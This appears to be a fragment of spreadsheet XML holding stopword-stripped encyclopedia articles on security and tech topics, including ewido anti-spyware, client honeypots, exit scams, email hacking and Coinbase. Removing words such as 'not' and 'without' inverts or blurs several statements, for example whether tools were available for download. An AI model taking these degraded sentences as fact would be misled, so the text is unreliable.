    <t>ewido networks software company based germany known creating ewido anti-spyware. ewido anti-spyware software used remove malware spyware, trojan horses, adware, dialers, worms. also featured real-time protection, automatic updates, privacy features. ewido free version, paid version added realtime protection, automatic updates. history ewido networks founded germany 2004 andreas rudyk, peter klapprodt tobias graf. their first product ewido security suite. ewido given digital river's award "best newcomer year". grisoft acquisition april 2006 announced czech grisoft acquired german anti-malware company ewido networks. this birth grisoft's anti spyware, anti spyware based ewido's engine. grisoft includes ewido many security suites bundles antivirus products. ewido anti-spyware this software began life ewido security suite name changed ewido anti-malware december 2005. with release 4.0, later changed ewido anti-spyware. ewido anti-spyware included features scheduled scans, file shredder, running process manager, interface. also included viewer. there free version realtime protection automatic updates (users could update manually). last known price $29.99. after grisoft's acquisition, however, ewido's anti-spyware development stopped. continues exist ewido online scanner ewido micro scanner, using full ewido engine signatures, without excluding heuristic detection options. 8.0, anti-spyware integrated anti-virus longer available standalone product. that means anti-spyware longer receive updates. ewido works many popular antivirus spyware products anti-virus ad-aware avast! antivirus avira security software comodo internet security counterspy kaspersky anti-virus mcafee norton antivirus sophos spybot search destroy spyware doctor zonealarm security suite also grisoft malware spyware references external links ewido's official site</t>
  </si>
  <si>
    <t>Exchange Online Protection</t>
  </si>
  <si>
    <t>exchange online protection (eop, formerly forefront online protection exchange fope) hosted e-mail security service, owned microsoft, filters spam removes computer viruses e-mail messages. service require client software installation, activated changing customer's record. each customer pays service means subscription. most administrative tasks performed web-based administrative console. console allows customers perform management tasks, adding users configuring filtering.eop part exchange online family products. history microsoft forefront online protection exchange originally created frontbridge technologies. microsoft acquired frontbridge technologies inc. 2005, became subsidiary microsoft.in 2006, microsoft announced branding microsoft exchange hosted services (ehs), formerly known frontbridge technologies inc. april 2009, service renamed forefront online security exchange.forefront online security exchange (fose) version released june 2009. november 2009, forefront online security exchange (fose) rebranded forefront online protection exchange (fope). update version forefront online protection exchange, also released date. version 10.1 release forefront online protection exchange (fope) available customers january 2010. march 2011, forefront online protection exchange (fope) updated version 11.1. march 2013, microsoft launched exchange online protection (eop). transition fope expected complete first half 2014. references external links official website fope user guide exchange hosted archive (eha) user guide forefront online protection exchange (fope):</t>
  </si>
  <si>
    <t>Client to Authenticator Protocol</t>
  </si>
  <si>
    <t>client authenticator protocol (ctap) x.1278 enables roaming, user-controlled cryptographic authenticator (such smartphone hardware security key) interoperate client platform laptop. standard ctap complementary authentication (webauthn) standard published world wide consortium (w3c). webauthn ctap primary outputs fido2 project, joint effort fido alliance w3c.ctap based upon previous work done fido alliance, particular universal factor (u2f) authentication standard. specifically, fido proposed standard (july 2017) became starting point ctap proposed standard, latest version published january 2019.the ctap specification refers protocol versions, ctap1/u2f protocol ctap2 protocol. authenticator implements ctap2 called fido2 authenticator (also called webauthn authenticator). authenticator implements ctap1/u2f well, backward compatible u2f. protocol uses cbor binary data serialization format. standard adopted itu-t recommendation x.1278. references external links fido specifications overview fido specifications</t>
  </si>
  <si>
    <t>Executive Recycling</t>
  </si>
  <si>
    <t>executive recycling englewood, colorado-based business specializing electronic waste recycling. minutes linked executive recycling illegal export electronic waste denver area guiyu, china. report, company also found illegally offered help undercover investigative team ship 1,500 (cathode tube) monitors 1,200 hong kong recycling purposes. story added federal government issued search warrant investigate executive recycling's actions. until november 2008, executive recycling partnered colorado's governor's office economic development assist recycling pickup events. response minutes report, executive recycling issued statement claiming "... discovered forged documents (provided port authorities) used improperly shift blame (executive recycling) sold tested working units canadian wholesale buyer. currently seeking legal actions wholesale buyer regards report." when asked denver business journal executive recycling shipments illegally made colorado china, minutes reported, company's ceo, brandon richter, answer questions.as december 2012, vice president executive recycling convicted multiple counts mail wire fraud environmental crimes related illegal disposal electronic waste, smuggling, obstruction justice, following 11-day trial." sentenced thirty months prison july 2013, vice president received sentence months federal prison. references external links official website "federal agents investigate recycling company". cbs4denver.com. january 2009. "executive recycling company executives sentenced fraud international environmental crimes". justice.gov. july 2013.</t>
  </si>
  <si>
    <t>Client honeypot</t>
  </si>
  <si>
    <t>honeypots security devices whose value probed compromised. traditional honeypots servers devices expose server services) wait passively attacked. client honeypots active security devices search malicious servers attack clients. client honeypot poses client interacts server examine whether attack occurred. often focus client honeypots browsers, client interacts servers part client honeypot (for example ftp, ssh, email, etc.). there several terms used describe client honeypots. besides client honeypot, generic classification, honeyclient term generally used accepted. however, subtlety here, "honeyclient" actually homograph could also refer first known open source client honeypot implementation (see below), although clear context. architecture client honeypot composed three components. first component, queuer, responsible creating list servers client visit. this list created, example, crawling. second component client itself, able make requests servers identified queuer. after interaction server taken place, third component, analysis engine, responsible determining whether attack taken place client honeypot. addition components, client honeypots usually equipped sort containment strategy prevent successful attacks spreading beyond client honeypot. this usually achieved firewalls virtual machine sandboxes. analogous traditional server honeypots, client honeypots mainly classified interaction level: high low; denotes level functional interaction server utilize client honeypot. addition also newly hybrid approaches denotes usage high interaction detection techniques. high interaction high interaction client honeypots fully functional systems comparable real systems real clients. such, functional limitations (besides containment strategy) exist high interaction client honeypots. attacks high interaction client honeypots detected inspection state system server interacted with. detection changes client honeypot indicate occurrence attack exploited vulnerability client. example change presence altered file. high interaction client honeypots effective detecting unknown attacks clients. however, tradeoff accuracy performance amount system state monitored make attack assessment. also, detection mechanism prone various forms evasion exploit. example, attack could delay exploit immediately triggering (time bombs) could trigger upon particular conditions actions (logic bombs). since immediate, detectable state change occurred, client honeypot likely incorrectly classify server safe even though successfully perform attack client. finally, client honeypots running virtual machines, exploit detect presence virtual environment cease triggering behave differently. capture-hpc capture high interaction client honeypot developed researchers victoria university wellington, capture differs existing client honeypots various ways. first, designed fast. state changes detected using event based model allowing react state changes occur. second, capture designed scalable. central capture server able control numerous clients across network. third, capture supposed framework allows utilize different clients. initial version capture supports internet explorer, current version supports major browsers (internet explorer, firefox, opera, safari) well http aware client applications, office applications media players. honeyclient honeyclient browser based (ie/firefox) high interaction client honeypot designed kathy wang 2004 subsequently developed mitre. first open source client honeypot perl, c++, ruby. honeyclient state-based detects attacks windows clients monitoring files, process events, registry entries. integrated capture-hpc real-time integrity checker perform detection. honeyclient also contains crawler, seeded list initial urls start continue traverse sites search client-side malware. honeymonkey (dead since 2010) honeymonkey browser based (ie) high interaction client honeypot implemented microsoft 2005. available download. honeymonkey state based detects attacks clients monitoring files, registry, processes. unique characteristic honeymonkey layered approach interacting servers order identify zero-day exploits. honeymonkey initially crawls vulnerable configuration. once attack identified, server reexamined fully patched configuration. attack still detected, conclude attack utilizes exploit patch publicly released therefore quite dangerous. shelia (dead since 2009) shelia high interaction client honeypot developed joan robert rocaspana vrije universiteit amsterdam. integrates email reader processes email receives (urls attachments). depending type attachment received, opens different client application (e.g. browser, office application, etc.) monitors whether executable instructions executed data area memory (which would indicate buffer overflow exploit triggered). with approach, shelia able detect exploits, able actually ward exploits triggering. spycrawler spycrawler developed university washington another browser based (mozilla) high interaction client honeypot developed moshchuk 2005. this client honeypot available download. spycrawler state based detects attacks clients monitoring files, processes, registry, browser crashes. spycrawlers detection mechanism event based. further, increases passage time virtual machine spycrawler operating overcome rather reduce impact time bombs. exploit finder implementation automatic drive-by-download detection virtualized environment, developed thomas müller, benjamin mack mehmet arziman, three students hochschule medien (hdm), stuttgart summer term 2006. used active honeynet complete virtualization architecture underneath rollbacks compromised virtualized machines. interaction interaction client honeypots differ high interaction client honeypots utilize entire real system, rather lightweight simulated clients interact server. browser world, similar crawlers). responses servers examined directly assess whether attack taken place. this could done, example, examining response presence malicious strings. interaction client honeypots easier deploy operate high interaction client honeypots also perform better. however, likely lower detection rate since attacks known client honeypot order detect them; attacks likely unnoticed. they also suffer problem evasion exploits, exacerbated simplicity, thus making easier exploit detect presence client honeypot. honeyc honeyc interaction client honeypot developed victoria university wellington christian seifert 2006. honeyc platform independent open source framework written ruby. currently concentrates driving browser simulator interact servers. malicious servers detected statically examining server's response malicious strings usage snort signatures. monkey-spider (dead since 2008) monkey-spider low-interaction client honeypot initially developed university mannheim ikinci. monkey-spider crawler based client honeypot initially utilizing anti-virus solutions detect malware. claimed fast expandable detection mechanisms. work started diploma thesis continued released free software gpl. phoneyc (dead since 2015) phoneyc low-interaction client developed jose nazario. phoneyc mimics legitimate browsers understand dynamic content de-obfuscating malicious content detection. furthermore, phoneyc emulates specific vulnerabilities pinpoint attack vector. phoneyc modular framework enables study malicious http pages understands modern vulnerabilities attacker techniques. spybye spybye [10] interaction client honeypot developed niels provos. spybye allows master determine whether site malicious heuristics scanning content clamav engine. thug thug [11] low-interaction client honeypot developed angelo dell'aera. thug emulates behaviour browser focused detection malicious pages. tool uses google javascript engine implements document object model (dom). important unique features thug are: activex controls handling module (vulnerability module), static dynamic analysis capabilities (using abstract syntax tree libemu shellcode analyser). thug written python general public license. yalih yalih (yet another interaction honeyclient) [12] interaction client honeypot developed masood mansoori honeynet chapter victoria university wellington, zealand designed detect malicious websites signature pattern matching techniques. yalih capability collect suspicious urls malicious website databases, bing api, inbox spam folder pop3 imap protocol. perform javascript extraction, de-obfuscation de-minification scripts embedded within website emulate referrer, browser agents handle redirection, cookies sessions. visitor agent capable fetching website multiple locations bypass geo-location cloaking attacks. yalih also generate automated signatures detect variations attack. yalih available open source project. minic minic [13] interaction client honeypot based wget retriever yara engine. designed light, fast suitable retrieval large number websites. minic allows simulate referrer, user-agent, accept_language variables. minic designed zealand honeynet chapter victoria university wellington. hybrid client honeypots hybrid client honeypots combine high interaction client honeypots gain advantages approaches. honeyspider (dead since 2013) honeyspider [14] network hybrid client honeypot developed joint venture nask/cert polska, govcert.nl surfnet. projects goal develop complete client honeypot system, based existing client honeypot solutions crawler specially bulk processing urls. references literature göbel, andreas dewald, client-honeypots: exploring malicious websites, oldenbourg verlag 2010, isbn 978-3-486-70526-3, this book amazon papers egele, wurzinger, kruegel, kirda, defending browsers drive-by downloads: mitigating heap-spraying code injection attacks, secure systems lab, 2009, available iseclab.org, accessed 2009. feinstein, ben. caffeine monkey: automated collection, detection analysis javascript. blackhat usa. vegas, 2007. ikinci, holz, freiling, f.c. monkey-spider: detecting malicious websites low-interaction honeyclients. sicherheit 2008: 407-421 archived 2013-01-02 wayback machine, moshchuk, bragin, gribble, s.d. levy, h.m. crawler-based study spyware web. 13th annual network distributed system security symposium (ndss). diego, 2006. internet society. provos, holz, virtual honeypots: from botnet tracking intrusion detection. addison-wesley. boston, 2007. provos, mavrommatis, rajab, monrose, your iframes point google technical report. google, inc., 2008. provos, mcnamee, mavrommatis, wang, modadugu, ghost browser: analysis web-based malware. proceedings 2007 hotbots. cambridge, april 2007. usenix. seifert, endicott-popovsky, frincke, komisarczuk, muschevici, welch, justifying need forensically ready protocols: case study identifying malicious servers using client honeypots. annual ifip 11.9 international conference digital forensics, kyoto, 2008. seifert, know your enemy: behind scenes malicious servers. honeynet project. 2007. seifert, komisarczuk, welch, application divide-and-conquer algorithm paradigm improve detection speed high interaction client honeypots. 23rd annual symposium applied computing. ceara, brazil, 2008. seifert, steenson, holz, yuan, davis, know your enemy: malicious servers. honeynet project. 2007. (available honeynet.org) seifert, welch, komisarczuk, honeyc: low-interaction client honeypot. proceedings 2007 nzcsrcs. university waikato, hamilton, zealand. april 2007. seifert, delwadia, komisarczuk, stirling, welch, measurement study malicious servers the.nz domain, 14th australasian conference information security privacy (acisp), brisbane, 2009. seifert, komisarczuk, welch, true positive cost curve: cost-based evaluation method high-interaction client honeypots, securware, athens, 2009. seifert, komisarczuk, welch, identification malicious pages static heuristics, austalasian telecommunication networks applications conference, adelaide, 2008. stuurman, thijs, verduin, alex. honeyclients interaction detection method. technical report. university amsterdam. february 2008. wang, y.-m., beck, jiang, roussev, verbowski, chen, king, automated patrol strider honeymonkeys: finding sites that exploit browser vulnerabilities. 13th annual network distributed system security symposium (ndss). diego, 2006. internet society. zhuge, jianwei, holz, thorsten, guo, jinpeng, han, xinhui, zou, wei. studying malicious websites underground economy chinese web. proceedings 2008 workshop economics information security. hanover, june 2008. presentations presentation websense honeyclient infrastructure next generation honeyclients currently working; april 2008 rsa-2008 honeynet project virtuelle leimrouten german) video michael davis' client honeypot presentation hitb 2006 video kathy wang's presentation honeyclient recon 2005 video wolfgarten's presentation conference sites https://web.archive.org/web/20100131222145/https://projects.honeynet.org/capture-hpc https://web.archive.org/web/20071204172932/http://handlers.dshield.org/rdanford/pub/2nd_generation_honeyclients.ppt https://web.archive.org/web/20100131222101/https://projects.honeynet.org/honeyc/ https://archive.today/20070410162806/http://www.honeyclient.org/trac https://web.archive.org/web/20180430012758/http://www.honeyspider.net/ http://monkeyspider.sourceforge.net/ https://code.google.com/p/phoneyc/ https://github.com/buffer/thug http://www.cs.vu.nl/~herbertb/misc/shelia/ http://www.spybye.org/ https://web.archive.org/web/20070322205829/http://www.xnos.org/security/overview.html https://web.archive.org/web/20100220013531/http://code.mwcollect.org/ http://nz-honeynet.org https://github.com/masood-m/yalih https://github.com/masood-m/minic</t>
  </si>
  <si>
    <t>Exeter pound</t>
  </si>
  <si>
    <t>exeter pound (£e) form local complementary currency, community currency launched exeter, september 2015. objective ensure money spent local independent businesses. many alternatives official sterling currency. discontinued september 2018. history previous exeter pound, local currencies launched bristol (2012), totnes (2006), lewes (2008), brixton (2009) stroud (2010). exeter pound local community currency designed improve local economy exeter. aimed support independent local traders enhance local economic activity. scheme exeter pound community interest company. made profit setting "expiry date" note, identified small print note itself, could spent.exeter pound made decision discontinue currency september 2018. martin, company's director, claimed societal moves toward cashless transactions lack regulatory framework develop digital currency factors. also list community currencies united kingdom references</t>
  </si>
  <si>
    <t>Exit scam</t>
  </si>
  <si>
    <t>exit scam confidence trick established business stops shipping orders receiving payment orders. entity good reputation, could take time widely recognized orders shipping, entity make money paid unshipped orders. customers trusted business realize orders fulfilled business already disappeared. conversely, purchasers also perpetrate exit scams secretly planning close business and/or abscond, procure goods services intend pay. however, sorts incidents less common. moreover, uncommon procurer business insolvency wish occur. such insolvencies typically considered criminal acts, alone exit scams unless clear evidence faith e.g., proven business avoided paying vendors even though solvent closing and/or became insolvent result embezzlement behavior. individual vendors often reach point reputation maturity whereby sold sufficient product accumulated significant reputation escrowed funds, many choose exit funds rather compete higher-volume higher-priced matured product level. individual vendors, exit scams often viable scheme dealing physical product (for buyers must reasonably expect wait receiving orders, thus often granting perpetrator considerable grace period scam longer plausibly denied) compared digital, virtual intangible goods buyers generally expect delivered within short time remitting payment. exit scams could tempting alternative non-fraudulent shutdown illegal operations operation inevitably going shut anyway reasons. illegal entity thrives selling and/or facilitating sale illicit drugs, example, constant risk shut authorities, whereas operators perform exit scam, much better prospects perpetrators keep profits avoid eventual prosecution. illegal darknet markets, exit scams frequently perpetrated. while common schemes perpetrated individual vendors receive payment product intention shipping, scams also perpetrated individual procurers obtain product intention paying operators and/or administrators markets who, shutting entire market, abscond whatever currency market holding behalf buyers and/or sellers escrow time shutdown. regardless perpetrating scam, cheated parties knowingly participating illegal activities, usually viable option notify enforcement.the best-known examples online sellers buyer know real identity physical location scammer therefore little recourse. payments darknet markets usually made cryptocurrencies bitcoin monero, payments irreversible cannot recovered chargeback. examples 2016, darknet market (online black market) evolution previously cited biggest exit scam yet, administrators apparently made million bitcoin, held escrow marketplace. this would ultimately surpassed (wall street market) exit scam 2019, $14.2 million worth cryptocurrencies stolen site seized authorities. references</t>
  </si>
  <si>
    <t>Cloud mining</t>
  </si>
  <si>
    <t>cloud mining process cryptocurrency mining utilizing remote datacenter shared processing power. this type cloud mining enables users mine bitcoins alternative cryptocurrencies without managing hardware. mining rigs housed maintained facility owned mining company customer simply needs register purchase mining contracts shares. since cloud mining provided service, generally cost result lower returns miner. types hosting users hosted mining equipment either lease physical mining server virtual private server install mining software machine. instead leasing dedicated server, services offer hashing power hosted data centers sale denominated gigahash/seconds (gh/s); users either select desired amount hashing power period contract cases trade hashing power. also mining pool references external links</t>
  </si>
  <si>
    <t>CloudHQ</t>
  </si>
  <si>
    <t>cloudhq information technology company based francisco, california. founded 2011 senad dizdar, currently chief executive officer (ceo). naomi assaraf chief marketing officer (cmo) since 2013, blaz lupiscek chief technology officer (cto). cloudhq synchronizes data across many cloud platforms, including gmail. also creates many browser extensions apps gmail others. data loss protection backup cloudhq protects data loss replicating data backup cloud account. this prevents data loss incidents steadily risen recent years. data synchronization when sync pair created cloudhq service, users given option choose one-way sync two-way sync. one-way sync: replication occur main cloud service secondary account, files added revised secondary account, changes reflected back original account. two-way sync: file additions revisions made main account replicated secondary account. file additions revisions made secondary account replicated back main account. this creates exact copy data cloud accounts. automatic replication cloudhq service runs automatically, constantly monitoring user-specified cloud account changes. when file added, file instantly replicated secondary cloud account. revisions made existing files also instantly replicated secondary cloud account. objective cloudhq provide data synchronization companies several purposes: sharing files data across multiple platforms integration cloud services offer integration create maintain centralized database data multiple cloud services project collaboration across multiple platforms backup data prevent data loss compatibility cloudhq cloud service compatible cloud synchronization apps google drive, microsoft outlook 365, amazon cloud drive, others. references external links cloudhq's official website</t>
  </si>
  <si>
    <t>CloudMe</t>
  </si>
  <si>
    <t>cloudme file storage service operated cloudme offers cloud storage, file synchronization client software. features blue folder appears devices content, files synchronized devices. cloudme service offered freemium business model provides encrypted connection extended validation certificate. cloudme provides client software microsoft windows, macos, linux, android, ios, google samsung smart windows storage server browsers. cloud sync storage provider, cloudme strong focus european market differentiates storage providers mobility media features like samsung smarttv support.recently novell announced support cloudme service dynamic file services suite. novosoft handy backup version also announced support cloudme. winzip also integrated cloudme. there many third party mobile apps software available cloudme, many using webdav support cloudme. history cloudme founded daniel arthursson 2012 mainly owned xcerion. company runs servers operates sweden. 2012 cloudme received herring global company, alwayson global award, white bull 2012 yearling award white bull 2014 longhorn award.previously cloudme.com called icloud.com, service changed name apple acquired domain trademark rumoured million dollars. visitors icloud.com directed cloudme.com. after name change, former icloud.com service split companies services, cloudme file sync storage, cloudtop virtual cloud desktop previously main attraction icloud.com service included file storage. xcerion, major owner cloudme cloudtop initially gained investment million build icloud service.using saas model, cloudme service provided free version storage referral program), model often called freemium, premium versions either 100, 200, storage consumers, business. closest competitor cloudme dropbox. features cloudme features cloud storage sync solution allows users store, access share content, people outside service. sharing done email, text messaging, facebook google. files stored blue folder, synchronized connected computers devices. desktop cloud service called cloudtop.com available uses cloudme internet file system. headquarters cloudme located drottninggatan linköping, sweden. also comparison file hosting services comparison file synchronization software comparison online backup services references external links official website</t>
  </si>
  <si>
    <t>ErrorSafe</t>
  </si>
  <si>
    <t>Email hacking</t>
  </si>
  <si>
    <t>email hacking unauthorized access manipulation account email correspondence. overview email widely used communication method. email account hacked, allow attacker access personal, sensitive confidential information mail storage; well allowing read incoming outgoing email send receive legitimate owner. email platforms, also allow setup automated email processing rules. could harmful legitimate user. attacks there number ways hacker illegally gain access email account. virus virus malware sent email, executed able capture user's password send attacker. phishing phishing involves emails appear legitimate sender scams verification personal information, account number, password, date birth. unsuspecting victims respond, result stolen accounts, financial loss, identity theft. prevention measures email internet sent simple mail transfer protocol (smtp). while mail encrypted mail servers, typically enforced, instead opportunistic used mail servers negotiate email connection whether encrypted, standard. where mail flow servers encrypted, could intercepted government agency contents read passive monitoring. higher security, email administrators configure servers require encryption specified servers domains. email spoofing similar issues facilitate phishing addressed 'stack' sender policy framework (spf), domainkeys identified mail (dkim) domain-based message authentication, reporting conformance (dmarc). setting place technically challenging, visible user, implementation progress slow. layer, authenticated received chain (arc), allows mail flow intermediate mail servers mailing lists forwarding services better handled common objection implementation. businesses typically advanced firewalls, anti-virus software intrusion detection systems (ids) prevent detect improper network access. they also security specialists perform audit company hire certified ethical hacker perform simulated attack "pen test" order find gaps security.although companies secure internal networks, vulnerabilities also occur home networking. email protected methods, creating strong password, encrypting contents, using digital signature. passwords leaked otherwise become known attacker, two-factor authentication enabled prevent improper access. there also specialist encrypted email services protonmail mailfence. cases email hacking notable cases email hacks include: email archives climatic research unit leaked create scandal popularly known climategate. news world journalists hacked email accounts stories. politician rowenna davis mail account taken held ransom. politician sarah palin hacked order find embarrassing incriminating correspondence. part sony pictures hack, 170,000 pieces email executives ended wikileaks. former united states president, george h.w. bush email hacked. personal email political consultant john podesta hacked, contents later published wikileaks. references</t>
  </si>
  <si>
    <t>Coinbase</t>
  </si>
  <si>
    <t>coinbase global, inc., branded coinbase, american publicly traded company operates cryptocurrency exchange platform. coinbase distributed company; employees operate remote work company lacks physical headquarters. largest cryptocurrency exchange united states trading volume. company founded 2012 brian armstrong fred ehrsam. history 2012–2019: founding early years coinbase founded june 2012 brian armstrong, former airbnb engineer. armstrong enrolled combinator startup incubator program received $150,000 cash infusion. fred ehrsam, former goldman sachs trader, later joined co-founder. british programmer blockchain.info co-founder reeves originally supposed part coinbase founding team parted ways armstrong combinator funding event, different stands coinbase wallet operate. company named coinbase transactions, special transactions introduce cryptocurrency circulation proof work cryptocurrencies.: october 2012, company launched services sell bitcoins bank transfers.in 2013, company received us$5 million series investment fred wilson venture capital firm union square ventures. december year, company received us$25 million investment, venture capital firms andreessen horowitz, union square ventures (usv), ribbit capital. olaf carlson-wee, graduate vassar college, hired first employee year.in 2014, company grew million users, acquired blockchain explorer service blockr bookmarking company kippt, secured insurance covering value bitcoin stored servers, launched vault system secure bitcoin storage. throughout 2014, company also partnered overstock, dell, expedia, dish network, time inc. allowing firms accept bitcoin payments. year, company also added bitcoin payment processing capabilities traditional payment companies stripe, braintree, paypal. january 2014, coinbase global, inc. incorporated delaware holding company coinbase subsidiaries. corporate reorganization coinbase become subsidiary coinbase global completed april year.in january 2015, company received us$75 million investment, draper fisher jurvetson, york stock exchange, usaa, several banks. later january, company launched u.s.-based bitcoin exchange professional traders called coinbase exchange. september, coinbase began offer services canada singapore.in 2016, company rebranded coinbase exchange, changing name global digital asset exchange (gdax). july, added retail support ether. also july, announced would halt services august closure canadian online payments service provider vogogo.in january march 2017, coinbase obtained bitlicense licensed trade ethereum litecoin york state department financial services (dfs). november, coinbase ordered internal revenue service report users least $20,000 transactions year. december coinbase listed bitcoin cash, coinbase platform experienced price abnormalities insider trading investigation.on february 2018, coinbase told approximately 13,000 affected customers company would providing taxpayer name, birth date, address, historical transaction records 2013 2015 within days. march, coinbase appointed emilie choi, former linkedin executive, vice president corporate business development. promoted role president chief operating officer 2019. march 2018, coinbase announced intention support erc-20 tokens. april 2018, coinbase announced formed early-stage venture fund, coinbase ventures, focusing investment blockchain- cryptocurrency-related companies. coinbase ventures announced first investment compound labs, start-up building ethereum smart contracts similar money markets. gdax rebranded coinbase pro. also may, coinbase launched prime, platform dedicated institutional customers. august, amazon cloud executive wagner joined coinbase vice president engineering. september, coinbase, along circle bitcoin miner company bitmain, part consortium called centre launched digital coin called coin, pegged dollar.in january 2019, coinbase stopped trading ethereum classic suspicion attack network. february, coinbase announced acquired "blockchain intelligence platform" neutrino, italy-based startup, undisclosed price. acquisition raised concern among coinbase users based neutrino founders' connection hacking team, accused providing internet surveillance technology governments poor human rights records. march coinbase brian armstrong said company "did properly evaluate" deal diligence perspective thus neutrino staff previously worked hacking team "will transition coinbase." april, corporate filing stated coinbase's non-u.s. revenue grew €153 million (u.s.$173 million) 2018 resulting profit €6.6 million. coinbase zeeshan feroz said company's non-u.s. operations accounted nearly one-third company's overall revenue reuters estimated company's global revenue totaled "around $520 million" 2018. august, coinbase announced targeted sophisticated hacking attack attempt mid-june. this reported attack used spear-phishing social engineering tactics (including sending fake e-mails compromised email accounts created landing page university cambridge) firefox browser zero-day vulnerabilities. firefox vulnerabilities could allow attacker escalate privileges javascript browser page (cve-2019–11707) second could allow attacker escape browser sandbox execute code host computer (cve-2019–11708). coinbase's security team detected blocked attack, network compromised, cryptocurrency stolen. 2020–2021: remote-first model 2020, covid-19 pandemic, company announced shifting completely remote work would longer recognize formal headquarters. also may, company announced acquisition york-based digital asset trading firm tagomi price $100 million. june, coinbase received internal backlash brian armstrong initially refused make statement black lives matter, citing company's apolitical culture, armstrong later reverted course twitter. september, armstrong published blog post emphasizing coinbase would engage social activism, citing activism hurt technology firms google facebook, offered severance package disagreed direction. company also faced complaints employees saying treated unfairly race gender. october, coinbase announced launch visa debit card program. december, york times reported based upon data 2018 (already years date publication) women coinbase paid average less comparable jobs ranks within company, black employees paid less similar roles.in march 2021, company fell review office foreign assets control, concerns company provided blockchain service blacklisted individuals companies, noting nature blockchain technology makes "technically infeasible" prevent specific users making transactions.in march 2021, company agreed $6.5 million settle regulatory claims reported misleading information trading volumes. also march, coinbase announced establishing business presence india hiring employees services, including engineering, software development customer support operations. company also announced plans open physical office hyderabad.in april 2021, final earnings release april direct listing, company reported nine-fold increase revenue, $1.8b, $190.6m previous year. jump attributed increase price bitcoin time period.on april 2021, coinbase became public company nasdaq exchange direct stock listing. before listing, nasdaq reference price $250.00 share, giving company estimated value billion. first trading, coinbase closed price $328.28 share. may, company's chief people officer published blog post announcing coinbase eliminating salary equity negotiations recruiting, citing salary disparities women minorities. announcement said "all employees position, location, receive salary equity offer." june, coinbase added dogecoin tradable assets coinbase users. september, securities exchange commission reportedly threatened coinbase company decided launch cryptocurrency lending product called lend. company initially responded blog post confused singled sec, later announced canceled planned launch. technology publication techcrunch covered story noted existence similar cryptocurrency lending products already market. november, coinbase made first acquisition india purchasing ai-powered support platform agara estimated $40–50 million. company stated would utilize agara's technology automate customer experience tools. december display glitch vastly inflated balances numerous users apparently, albeit briefly, trillionaires. 2022–present super bowl advertisement coinbase's second commercial super bowl achieved viral status considered effective commercial game. credited accenture interactive, cost $217,000 second million) featured black, screensaver-like screen bouncing color changing code. code directed users page advertising free bitcoin accounts plus entry promotion sweepstakes million prizes bitcoin. tech image evoked retro look screensaver logo bouncing around screen.the advertisement narration music. influx users caused coinbase's website crash. coinbase's landing page received million hits minute. jumped #186 overall downloads advertisement. parodied later night meta (which posted own, similar social media advertise streaming fighters concert game). meta quipped "hopefully break." super bowl nicknamed "crypto bowl" also featured commercials crypto.com, etoro, american telecast.the martin agency kristen cavallo criticized coinbase brian armstrong acknowledging role agencies played creation russian invasion ukraine, failure india expansion, layoffs, partnerships response 2022 russian invasion ukraine, coinbase blocked 25,000 cryptocurrency wallet addresses related russia, believing engaged illicit activity.coinbase began operations india april 2022. company initially relied unified payments interface allow users convert rupees cryptocurrencies, ceased using statement released national payments corporation india indicating "not aware crypto exchange using upi". this statement forced coinbase suspend business india. users india cannot convert rupees cryptocurrency, trade different cryptocurrencies.on june 2022, company announced would laying approximately percent workforce, 1,100 full-time jobs, amid global downturn cryptocurrencies services.in august 2022, coinbase announced partnership blackrock. venture allows blackrock clients aladdin investment management system oversee exposure bitcoin along portfolio assets, facilitate trading coinbase's exchange.coinbase reported loss $1.1 billion second quarter 2022, record company. products coinbase offers products retail institutional cryptocurrency investors, well related cryptocurrency products. company's products retail traders include: coinbase, used buy, store trade different cryptocurrencies, bitcoin, bitcoin cash, ethereum, ethereum classic litecoin. coinbase pro, professional asset trading platform trading digital assets. coinbase wallet, allows customers access decentralized crypto apps (dapps) using dapp browser. coinbase nft, marketplace collectors sell pieces another.products institutional traders include: coinbase prime, trading platform institutional customers. coinbase custody, specialist level services institutions hold bitcoin cryptocurrencies coinbase.other cryptocurrency-related products include: coin, digital stablecoin lets customers u.s. dollars exchange cryptocurrency value traded quickly. coinbase card, debit visa card allows customers spend cryptocurrency. coinbase commerce, payment service merchants. coinbase earn, cryptocurrency learning platform rewards users small amounts altcoins watching videos taking quizzes learn them.the company develops application programming interface (api) developers merchants build applications accept payments digital currencies.coinbase mobile android. operations coinbase operates remote-first company physical headquarters. part filing public, company reported million verified users, 7,000 institutions, 115,000 ecosystem partners countries. also reported revenue $1.14 billion 2020, $483 million previous year. company also reported income $322 million posting loss 2019. $782 billion worth assets crypto market, billion worth held coinbase platform.as 2018, company offered buy/sell trading functionality countries, cryptocurrency wallet available countries worldwide. custody client assets 2022 form 10-q filing, coinbase stated "because custodially held crypto assets considered property bankruptcy estate, event bankruptcy, crypto assets hold custody behalf customers could subject bankruptcy proceedings customers could treated general unsecured creditors". coinbase effect "coinbase effect" refers rise price cryptocurrencies listed sale dominant crypto exchange coinbase days news becomes public. according barron's, effect getting cryptocurrency listed exchange plays role cryptocurrencies gain widespread acceptance. complaints february 2018, coinbase admitted customers overcharged error credit debit purchases cryptocurrencies. problem initiated banks card issuers changed merchant category code (mcc) cryptocurrency purchases earlier month. this meant cryptocurrency payments would processed "cash advances", meaning banks credit card issuers could begin charging customers cash advance fees cryptocurrency purchases. customers purchased cryptocurrency exchange january february 2018, could affected. first, visa blamed coinbase, telling financial times february "not made systems changes would result duplicate transactions cardholders reporting." however, latest statement visa worldpay coinbase blog clarifies: "this issue caused coinbase."in march 2018, quartz reported number monthly customer complaints coinbase jumped 100% january year, 889, citing official consumer financial protection bureau data, categorized "money available promised". article also noted company subsequently increasing customer service staff reduce wait times.in december 2021, cnbc reported coinbase froze cryptocurrency gyen sudden price spike, resulting many traders losing money. insider trading july 2022, former coinbase product manager, ishan wahi, along nikhil wahi (ishan's brother) sameer ramani friend), charged first-ever insider trading case cryptocurrency prosecutors southern district york securities exchange commission. according complaint filed wahi, ishan wahi allegedly shared information certain tokens listed coinbase nikhil wahi ramani, allegedly acted upon information make trades alleged illicit profit excess $1.5 million. according federal prosecutors, ishan wahi purchased one-way ticket india upon summoned coinbase company's seattle office meeting. wahi subsequently intercepted enforcement boarding flight india. coinbase's chief security officer, philip martin, noted company provided prosecutors information internal investigation. also list bitcoin companies references external links official website business data coinbase global, inc.:</t>
  </si>
  <si>
    <t>CoinDesk</t>
  </si>
  <si>
